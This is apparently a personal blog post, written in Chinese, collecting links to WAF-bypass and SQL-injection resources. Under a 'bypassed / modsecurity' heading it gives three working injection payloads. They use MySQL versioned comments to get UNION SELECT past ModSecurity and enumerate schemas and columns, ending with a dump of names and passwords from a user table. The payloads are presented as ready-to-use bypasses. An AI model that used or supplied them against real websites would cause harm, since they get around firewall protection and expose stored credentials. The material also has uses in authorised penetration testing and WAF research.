waf绕过技巧库

on under web
1 minute read
waf绕过技巧库:
http://wafbypass.me/w/index.php/Main_Page  may be a best one
https://xianzhi.aliyun.com/forum/attachment/big_size/wafbypass_sql.pdf good
http://www.freebuf.com/articles/web/10099.html   WAF绕过的奇技淫巧
http://tech-technical.com/index.php/2015/11/11/waf-bypass-sql-injection-tutorial/ 老外的技巧
http://webvuln.blogspot.hk/2015_04_01_archive.html 测试fuzz
http://www.wooyun.org/bugs/wooyun-2014-089426  good
https://forum.90sec.org/forum.php?mod=viewthread&tid=9133  90sec新思路
http://www.idiot-attacker.com/2016/02/macam-macam-kode-bypass-waf.html good
http://wooyun.org/bugs/wooyun-2010-0121291
http://wooyun.org/bugs/wooyun-2010-0115175 fuzz2bypass
http://drops.wooyun.org/tips/7883 
http://www.securityidiots.com/Web-Pentest/WAF-Bypass/
http://www.pentest.net.cn/post/7
http://www.mottoin.com/86886.html
http://mp.weixin.qq.com/s?__biz=MzIyNjQzMjcyNw==&mid=2247483860&idx=1&sn=fa19f02e29d25f5f6852af27451ae4a9&scene=23&srcid=0815JYA53l0Bk3PMkhzRlKUh#rd
https://forum.90sec.org/forum.php?mod=viewthread&tid=10531  waf的fuzz思路
https://zhuanlan.zhihu.com/p/25724834    等价替换绕过
https://zhuanlan.zhihu.com/p/25678670    fuzz注释绕过

0x01 bypassed

1>modsecurity
id=-29 /*!30000union select 1,2,group_concat(0x7e,0x27,unhex(Hex(cast(schema_name as char))),0x27,0x7e),version(),5,6,7,8 from `information_schema`.schemata*/--
id=-29 /*!30000union select 1,2,group_concat(0x7e,0x27,unhex(Hex(cast(column_name as char))),0x27,0x7e),version(),5,6,7,8 from `information_schema`.columns where table_name=0x75736572*/--
id=-29 /*!30000union select 1,2,group_concat(0x7e,0x27,unhex(Hex(cast(name as char))),0x3a,unhex(Hex(cast(password as char))),0x27,0x7e),version(),5,6,7,8 from user*/--
waf, bypass
home
github
archive
category